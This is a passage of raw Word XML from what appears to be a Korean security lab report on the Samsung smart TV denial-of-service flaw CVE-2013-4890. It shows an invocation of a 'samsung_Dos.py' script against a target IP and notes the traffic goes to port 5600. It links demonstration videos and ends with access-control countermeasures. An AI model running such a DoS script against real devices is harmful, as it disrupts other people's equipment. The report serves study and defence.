          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>amsung_Dos.py “</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>공격 대상i</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>p”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E747CF" w14:textId="2A979244" w:rsidR="0088257A" w:rsidRPr="0035631E" w:rsidRDefault="0088257A" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D3052F" w14:textId="4C64F37D" w:rsidR="0026544D" w:rsidRPr="0035631E" w:rsidRDefault="0026544D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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0911B9BD" wp14:editId="1545A306">
            <wp:extent cx="6840001" cy="5591251"/>
            <wp:effectExtent l="19050" t="19050" r="18415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5591251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DDE04B" w14:textId="03FC0FED" w:rsidR="0026544D" w:rsidRPr="0035631E" w:rsidRDefault="0026544D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>당연히 실제 삼성 스마트T</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>V</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>가 연결되어 있지 않으므로 진행되지 않는다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FBBA4E" w14:textId="77777777" w:rsidR="00A41756" w:rsidRPr="0035631E" w:rsidRDefault="00A41756" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57AB3D97" w14:textId="36028115" w:rsidR="0026544D" w:rsidRPr="0035631E" w:rsidRDefault="00A41756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  <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A3C615A" wp14:editId="68ABCE5E">
            <wp:extent cx="6840001" cy="1941576"/>
            <wp:effectExtent l="19050" t="19050" r="18415" b="209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1" cy="1941576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1EC22C" w14:textId="43CEC793" w:rsidR="00A41756" w:rsidRPr="0035631E" w:rsidRDefault="00A41756" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">그러나 패킷을 확인해 보면 목적지 포트 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>5600</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>번으로 보내는 것은 확인할 수 있다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5514B6A7" w14:textId="16AFF525" w:rsidR="00176B6B" w:rsidRPr="0035631E" w:rsidRDefault="00176B6B" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="775C4310" w14:textId="5C6436EA" w:rsidR="00176B6B" w:rsidRPr="0035631E" w:rsidRDefault="00176B6B" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>outube</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>에서의 C</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve">VE-2013-4890 </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>취약점</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E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 w:hint="eastAsia"/>
        </w:rPr>
        <w:t>시연 영상</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FF3DF1" w14:textId="3DF786BF" w:rsidR="00176B6B" w:rsidRPr="0035631E" w:rsidRDefault="00176B6B" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId118" w:history="1">
        <w:r w:rsidRPr="0035631E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=U-R2epNnUiM</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6CD750B8" w14:textId="2E79687E" w:rsidR="00176B6B" w:rsidRPr="0035631E" w:rsidRDefault="00176B6B" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId119" w:history="1">
        <w:r w:rsidRPr="0035631E">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
          </w:rPr>
          <w:t>https://www.youtube.com/watch?v=9NZgLHYRg7g</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="620F58C9" w14:textId="31061DB1" w:rsidR="00176B6B" w:rsidRPr="0035631E" w:rsidRDefault="00176B6B" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding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5482D" w:rsidRPr="00BE7966" w14:paraId="5E683E75" w14:textId="77777777" w:rsidTr="002E286F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6066AF84" w14:textId="77777777" w:rsidR="0045482D" w:rsidRPr="00BE7966" w:rsidRDefault="0045482D" w:rsidP="002E286F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45482D" w:rsidRPr="00BE7966" w14:paraId="5248075E" w14:textId="77777777" w:rsidTr="002E286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6030FC33" w14:textId="7E103F2E" w:rsidR="0045482D" w:rsidRPr="00BE7966" w:rsidRDefault="0045482D" w:rsidP="002E286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45482D">
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>대응 방안</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35B061E0" w14:textId="661D47E6" w:rsidR="0035631E" w:rsidRPr="0035631E" w:rsidRDefault="0045482D" w:rsidP="0035631E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1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="0035631E" w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 관리자 페이지에 임의의 사용자가 접근할 수 없도록 관리자 페이지에 접근할 수 있는 권한을 가진 단말기만 접근 가능하도록 접근권한을 설정한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA7A777" w14:textId="4780206B" w:rsidR="0035631E" w:rsidRPr="0035631E" w:rsidRDefault="0035631E" w:rsidP="0035631E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2</w:t>
      </w:r>
      <w:r w:rsidR="0045482D">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 웹 관리자 메뉴의 접근을 특정 네트워크 대역으로 제한하여, IP 주소까지도 인증 요소로 체크하도록 웹 관리자 사용자 인터페이스를 개발한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CD058F3" w14:textId="5C0913A8" w:rsidR="0035631E" w:rsidRPr="0035631E" w:rsidRDefault="0035631E" w:rsidP="0035631E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3</w:t>
      </w:r>
      <w:r w:rsidR="0045482D">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 관리자 인증 후 접속할 수 있는 페이지의 경우 해당 페이지 주소를 직접 입력하여 접속하지 못하도록 관리자 페이지 각각에 대하여 관리자 인증을 위한 세션을 관리한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF11826" w14:textId="634B67F7" w:rsidR="0035631E" w:rsidRPr="0035631E" w:rsidRDefault="0035631E" w:rsidP="0035631E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4</w:t>
      </w:r>
      <w:r w:rsidR="0045482D">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 정보시스템(네트워크 장비,</w:t>
      </w:r>
      <w:r w:rsidR="00617D3C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/>
        </w:rPr>
        <w:t>서버,</w:t>
      </w:r>
      <w:r w:rsidR="00617D3C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/>
        </w:rPr>
        <w:t>응용프로그램,</w:t>
      </w:r>
      <w:r w:rsidR="00617D3C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/>
        </w:rPr>
        <w:t>DB</w:t>
      </w:r>
      <w:r w:rsidR="00617D3C">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>등) 및 정보보호시스템에 대한 접근은 사용자 인증, 로그인 횟수 제한, 불법 로그인 시도 경고 등 안전한 사용자 인증 절차에 의해 통제되어야 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F385AA5" w14:textId="021D736C" w:rsidR="0035631E" w:rsidRPr="0035631E" w:rsidRDefault="0035631E" w:rsidP="0035631E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="0045482D">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="0035631E">
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
        </w:rPr>
        <w:t xml:space="preserve"> 공개 인터넷망을 통하여 접속을 허용하는 주요 정보시스템의 경우 아이디, 패스워드 기반의 사용자 인증 이외의 강화된 인증수단(OTP,공인인증서 등)적용을 고려하여야 한다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241B39CC" w14:textId="77777777" w:rsidR="0035631E" w:rsidRPr="0035631E" w:rsidRDefault="0035631E" w:rsidP="009678B1">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0035631E" w:rsidRPr="0035631E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84C9" w14:textId="77777777" w:rsidR="00AA5E9B" w:rsidRDefault="00AA5E9B" w:rsidP="000D6EBD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="457F8175" w14:textId="77777777" w:rsidR="00AA5E9B" w:rsidRDefault="00AA5E9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381F" w14:textId="77777777" w:rsidR="00AA5E9B" w:rsidRDefault="00AA5E9B" w:rsidP="000D6EBD">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="10034E80" w14:textId="77777777" w:rsidR="00AA5E9B" w:rsidRDefault="00AA5E9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53C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57828EC8"/>
    <w:lvl w:ilvl="0" w:tplc="1DC803F6">
      <w:start w:val="3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980A42"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8B8E47E"/>
    <w:lvl w:ilvl="0" w:tplc="903A90DC">
      <w:start w:val="8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8B0EB9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EEBEB246"/>
    <w:lvl w:ilvl="0" w:tplc="51D6DA1C">
      <w:start w:val="8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9D5B7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E97E4468"/>
    <w:lvl w:ilvl="0" w:tplc="C9F42BF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2010F1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7EE0E26C"/>
    <w:lvl w:ilvl="0" w:tplc="75FCA5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C30260"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C38C6678"/>
    <w:lvl w:ilvl="0" w:tplc="07129886">
      <w:start w:val="3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8D4F83"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD64294C"/>
    <w:lvl w:ilvl="0" w:tplc="A2702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7F0235"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F3FCC406"/>
    <w:lvl w:ilvl="0" w:tplc="C7F81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67696"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="11CAF502"/>
    <w:lvl w:ilvl="0" w:tplc="FFFCFF1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D62944"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="512A300E"/>
    <w:lvl w:ilvl="0" w:tplc="744616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97085B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8FD2EA4E"/>
    <w:lvl w:ilvl="0" w:tplc="014AB244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C2333A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FE06F85E"/>
    <w:lvl w:ilvl="0" w:tplc="81F4EF0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3575620"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7116E464"/>
    <w:lvl w:ilvl="0" w:tplc="A7BC84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6F05986"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7E6C55CA"/>
    <w:lvl w:ilvl="0" w:tplc="D48487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D9D5F31"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3626D29C"/>
    <w:lvl w:ilvl="0" w:tplc="3C9C82B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EB44B32"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="274A954C"/>
    <w:lvl w:ilvl="0" w:tplc="703C2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33902"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5D481C8E"/>
    <w:lvl w:ilvl="0" w:tplc="A2A889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6461CB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D6B68DC8"/>
    <w:lvl w:ilvl="0" w:tplc="FCAE6A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A37E15"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4AA2A56A"/>
    <w:lvl w:ilvl="0" w:tplc="C15EB23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8436AF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9C76C280"/>
    <w:lvl w:ilvl="0" w:tplc="B2DAC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"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="23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25"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="22">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="23">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="24">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="25">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="26">
    <w:abstractNumId w:val="26"/>
  </w:num>
  <w:num w:numId="27">
    <w:abstractNumId w:val="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3A8E"/>
    <w:rsid w:val="00006C47"/>
    <w:rsid w:val="00006D7B"/>
    <w:rsid w:val="00007971"/>
    <w:rsid w:val="00007D84"/>
    <w:rsid w:val="0002154F"/>
    <w:rsid w:val="00025C1B"/>
    <w:rsid w:val="0004419D"/>
    <w:rsid w:val="00051F53"/>
    <w:rsid w:val="000606F4"/>
    <w:rsid w:val="00065EEB"/>
    <w:rsid w:val="00067224"/>
    <w:rsid w:val="00071EAC"/>
    <w:rsid w:val="00081D1F"/>
    <w:rsid w:val="00097A38"/>
    <w:rsid w:val="000A6A41"/>
    <w:rsid w:val="000B3623"/>
    <w:rsid w:val="000B49E3"/>
    <w:rsid w:val="000D511C"/>
    <w:rsid w:val="000D6EBD"/>
    <w:rsid w:val="000E4115"/>
    <w:rsid w:val="000F3AA9"/>
    <w:rsid w:val="000F44BE"/>
    <w:rsid w:val="001072CD"/>
    <w:rsid w:val="00120927"/>
    <w:rsid w:val="00135ACB"/>
    <w:rsid w:val="001416CF"/>
    <w:rsid w:val="00152A4C"/>
    <w:rsid w:val="0016436D"/>
    <w:rsid w:val="00176B6B"/>
    <w:rsid w:val="00180F3C"/>
    <w:rsid w:val="00183DFF"/>
    <w:rsid w:val="00186254"/>
    <w:rsid w:val="00187B43"/>
    <w:rsid w:val="001925F6"/>
    <w:rsid w:val="00192F22"/>
    <w:rsid w:val="00196A76"/>
    <w:rsid w:val="001A24C9"/>
    <w:rsid w:val="001D1AE2"/>
    <w:rsid w:val="001F0BA1"/>
    <w:rsid w:val="001F0F99"/>
    <w:rsid w:val="001F4962"/>
    <w:rsid w:val="002039EB"/>
    <w:rsid w:val="002044FF"/>
    <w:rsid w:val="0020634D"/>
    <w:rsid w:val="00235628"/>
    <w:rsid w:val="00243D3D"/>
    <w:rsid w:val="002460B2"/>
    <w:rsid w:val="002541BE"/>
    <w:rsid w:val="00257096"/>
    <w:rsid w:val="0026314E"/>
    <w:rsid w:val="002631E4"/>
    <w:rsid w:val="0026544D"/>
    <w:rsid w:val="0028400A"/>
    <w:rsid w:val="0028607F"/>
    <w:rsid w:val="002A0760"/>
    <w:rsid w:val="002C574A"/>
    <w:rsid w:val="002D5F30"/>
    <w:rsid w:val="00304459"/>
    <w:rsid w:val="00305A28"/>
    <w:rsid w:val="003140DC"/>
    <w:rsid w:val="00341A30"/>
    <w:rsid w:val="00355403"/>
    <w:rsid w:val="0035631E"/>
    <w:rsid w:val="003610F0"/>
    <w:rsid w:val="0037104B"/>
    <w:rsid w:val="00386079"/>
    <w:rsid w:val="003866B2"/>
    <w:rsid w:val="00392998"/>
    <w:rsid w:val="003955C1"/>
    <w:rsid w:val="003A7C22"/>
    <w:rsid w:val="003C44E4"/>
    <w:rsid w:val="003C7EE5"/>
    <w:rsid w:val="003D753D"/>
    <w:rsid w:val="003E0143"/>
    <w:rsid w:val="003E6206"/>
    <w:rsid w:val="003F4A1F"/>
    <w:rsid w:val="00400BA8"/>
    <w:rsid w:val="0040643D"/>
    <w:rsid w:val="00407D54"/>
    <w:rsid w:val="00410397"/>
    <w:rsid w:val="004249BE"/>
    <w:rsid w:val="00424D56"/>
    <w:rsid w:val="00435F8A"/>
    <w:rsid w:val="004455B9"/>
    <w:rsid w:val="0045482D"/>
    <w:rsid w:val="00467053"/>
    <w:rsid w:val="00483DC7"/>
    <w:rsid w:val="00497CA0"/>
    <w:rsid w:val="004C2E0B"/>
    <w:rsid w:val="004C4F46"/>
    <w:rsid w:val="004D06EF"/>
    <w:rsid w:val="004D094A"/>
    <w:rsid w:val="004E35AC"/>
    <w:rsid w:val="00504FC5"/>
    <w:rsid w:val="0050741D"/>
    <w:rsid w:val="00515D7D"/>
    <w:rsid w:val="00522065"/>
    <w:rsid w:val="00526DD4"/>
    <w:rsid w:val="0053347F"/>
    <w:rsid w:val="005351E1"/>
    <w:rsid w:val="00536A55"/>
    <w:rsid w:val="00536FF1"/>
    <w:rsid w:val="0056616F"/>
    <w:rsid w:val="00574E0F"/>
    <w:rsid w:val="0058148E"/>
    <w:rsid w:val="005846BA"/>
    <w:rsid w:val="005874F2"/>
    <w:rsid w:val="005A0FA9"/>
    <w:rsid w:val="005A7234"/>
    <w:rsid w:val="005C11FC"/>
    <w:rsid w:val="005C6508"/>
    <w:rsid w:val="005D146E"/>
    <w:rsid w:val="00603F18"/>
    <w:rsid w:val="00605DF8"/>
    <w:rsid w:val="00607A89"/>
    <w:rsid w:val="00613C38"/>
    <w:rsid w:val="00613C77"/>
    <w:rsid w:val="0061730C"/>
    <w:rsid w:val="00617D3C"/>
    <w:rsid w:val="0062040D"/>
    <w:rsid w:val="00625FE6"/>
    <w:rsid w:val="006323A6"/>
    <w:rsid w:val="00633431"/>
    <w:rsid w:val="00637AED"/>
    <w:rsid w:val="00640098"/>
    <w:rsid w:val="006500C1"/>
    <w:rsid w:val="006559E9"/>
    <w:rsid w:val="00663A45"/>
    <w:rsid w:val="00671AE2"/>
    <w:rsid w:val="006753F4"/>
    <w:rsid w:val="006814DF"/>
    <w:rsid w:val="00695203"/>
    <w:rsid w:val="006B31BB"/>
    <w:rsid w:val="006D02C8"/>
    <w:rsid w:val="006E3D78"/>
    <w:rsid w:val="006E76F5"/>
    <w:rsid w:val="006F2E6D"/>
    <w:rsid w:val="00707009"/>
    <w:rsid w:val="00711A95"/>
    <w:rsid w:val="007252C0"/>
    <w:rsid w:val="00730FAC"/>
    <w:rsid w:val="00735CB9"/>
    <w:rsid w:val="007369AE"/>
    <w:rsid w:val="0073760D"/>
    <w:rsid w:val="0074270C"/>
    <w:rsid w:val="0075068E"/>
    <w:rsid w:val="00755BD0"/>
    <w:rsid w:val="00756DD0"/>
    <w:rsid w:val="0077795D"/>
    <w:rsid w:val="007831E4"/>
    <w:rsid w:val="00795E70"/>
    <w:rsid w:val="007A3FAB"/>
    <w:rsid w:val="007B75B2"/>
    <w:rsid w:val="007C0697"/>
    <w:rsid w:val="007C11B9"/>
    <w:rsid w:val="007C5BE8"/>
    <w:rsid w:val="007D4199"/>
    <w:rsid w:val="007F2AA2"/>
    <w:rsid w:val="007F55DB"/>
    <w:rsid w:val="007F6510"/>
    <w:rsid w:val="008046EE"/>
    <w:rsid w:val="00810D7F"/>
    <w:rsid w:val="008134D3"/>
    <w:rsid w:val="008335CD"/>
    <w:rsid w:val="008558A3"/>
    <w:rsid w:val="00860EA6"/>
    <w:rsid w:val="008622C3"/>
    <w:rsid w:val="0086277C"/>
    <w:rsid w:val="00867810"/>
    <w:rsid w:val="00881308"/>
    <w:rsid w:val="0088257A"/>
    <w:rsid w:val="008A7C7B"/>
    <w:rsid w:val="008B24C0"/>
    <w:rsid w:val="008B2F50"/>
    <w:rsid w:val="008B778F"/>
    <w:rsid w:val="008D315B"/>
    <w:rsid w:val="008E68CE"/>
    <w:rsid w:val="0092352A"/>
    <w:rsid w:val="0093241B"/>
    <w:rsid w:val="00942DE7"/>
    <w:rsid w:val="00943F7D"/>
    <w:rsid w:val="00947F8A"/>
    <w:rsid w:val="00952E43"/>
    <w:rsid w:val="009678B1"/>
    <w:rsid w:val="00975CE1"/>
    <w:rsid w:val="00977B7F"/>
    <w:rsid w:val="009B24CF"/>
    <w:rsid w:val="009B5EDA"/>
    <w:rsid w:val="009C2BF6"/>
    <w:rsid w:val="009D507E"/>
    <w:rsid w:val="009E4377"/>
    <w:rsid w:val="009F0A19"/>
    <w:rsid w:val="009F50D9"/>
    <w:rsid w:val="00A069B2"/>
    <w:rsid w:val="00A155B8"/>
    <w:rsid w:val="00A21FC0"/>
    <w:rsid w:val="00A22F89"/>
    <w:rsid w:val="00A41756"/>
    <w:rsid w:val="00A46195"/>
    <w:rsid w:val="00A473CF"/>
    <w:rsid w:val="00A5041C"/>
    <w:rsid w:val="00A508B7"/>
    <w:rsid w:val="00A51ABA"/>
    <w:rsid w:val="00A906F7"/>
    <w:rsid w:val="00A94C12"/>
    <w:rsid w:val="00AA122C"/>
    <w:rsid w:val="00AA5E9B"/>
    <w:rsid w:val="00AC7F7A"/>
    <w:rsid w:val="00AE6F05"/>
    <w:rsid w:val="00B011A0"/>
    <w:rsid w:val="00B25403"/>
    <w:rsid w:val="00B309AF"/>
    <w:rsid w:val="00B540A5"/>
    <w:rsid w:val="00B60A60"/>
    <w:rsid w:val="00B64A75"/>
    <w:rsid w:val="00B67587"/>
    <w:rsid w:val="00B73BF3"/>
    <w:rsid w:val="00B75F57"/>
    <w:rsid w:val="00B7649D"/>
    <w:rsid w:val="00B77494"/>
    <w:rsid w:val="00B808B1"/>
    <w:rsid w:val="00BB363E"/>
    <w:rsid w:val="00BD1197"/>
    <w:rsid w:val="00BE7966"/>
    <w:rsid w:val="00BF24B9"/>
    <w:rsid w:val="00BF7530"/>
    <w:rsid w:val="00C151D3"/>
    <w:rsid w:val="00C21A23"/>
    <w:rsid w:val="00C33C57"/>
    <w:rsid w:val="00C526C5"/>
    <w:rsid w:val="00C53B67"/>
    <w:rsid w:val="00C61ABA"/>
    <w:rsid w:val="00C711A0"/>
    <w:rsid w:val="00C74402"/>
    <w:rsid w:val="00C75C0A"/>
    <w:rsid w:val="00C91E68"/>
    <w:rsid w:val="00CA235D"/>
    <w:rsid w:val="00CA61E4"/>
    <w:rsid w:val="00CA7C4B"/>
    <w:rsid w:val="00CB76E6"/>
    <w:rsid w:val="00CD5594"/>
    <w:rsid w:val="00CE34D1"/>
    <w:rsid w:val="00CF606D"/>
    <w:rsid w:val="00D05BD9"/>
    <w:rsid w:val="00D1788F"/>
    <w:rsid w:val="00D34610"/>
    <w:rsid w:val="00D50EB8"/>
    <w:rsid w:val="00D559D7"/>
    <w:rsid w:val="00D77909"/>
    <w:rsid w:val="00D83289"/>
    <w:rsid w:val="00D85135"/>
    <w:rsid w:val="00D961AB"/>
